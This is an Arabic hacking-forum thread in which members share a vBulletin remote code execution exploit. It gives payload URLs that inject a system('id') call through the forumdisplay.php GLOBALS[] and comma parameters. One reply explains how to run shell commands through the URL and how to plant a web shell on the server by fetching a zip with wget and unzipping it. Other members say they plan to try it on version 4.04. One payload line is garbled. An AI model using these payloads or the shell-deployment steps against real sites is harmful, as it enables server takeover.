:: vBspiders Professional Network :: - الحققققق ثغرة جديده بمنتديات vb

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- - الحققققق ثغرة جديده بمنتديات vb (http://www.vbspiders.com/vb/t35108.html)

الحققققق ثغرة جديده بمنتديات vb

السلام عليكم .. اعضاء العناكب .. من خلال تصحفي بموقع الاكسبلويت

حصل ثغرة .. شكلي اول مافتحت على الموقع توه منزله ثغرة مصابه فيها منتديات vb

لاتفوووتكم . ألثغرة الحقوووووا .. عليها هذا رابط الثغرررررة

http://www.exploit-db.com/exploits/14686/

مشكور ثغرة من جد طازة :)

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي

كود PHP:

   http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

 

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

 

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

 

http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

 

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

اقتباس:

المشاركة الأصلية كتبت بواسطة GuEvArA511 (المشاركة 197948)

كود PHP:

   http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

 

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

 

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

 

http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

 

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

عزيزي هذه تغرة Code Execution يعني تقدر تطبق أوامر التي تستعملها في الشل في رابط الموقع مباشرة

يعني مثلا http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

بهذا سيظهر لك في الموقع صلاحياتك على السيرفر لأننا ادرجنا الأمر id

افضل الطرق انك تسحب شل من موقع آخر برابط مباشر بصيغة zip (مضغوط) بالأمر wget

و تفك الضغط الضغط بالأمر unzip و تدخل على الشل و smilies12

يعطيك العافية

مشكور اخي الثغرة في الاصدار 4.04 نجرب و نعود ان كانت فعالة ام لا...شكرا لك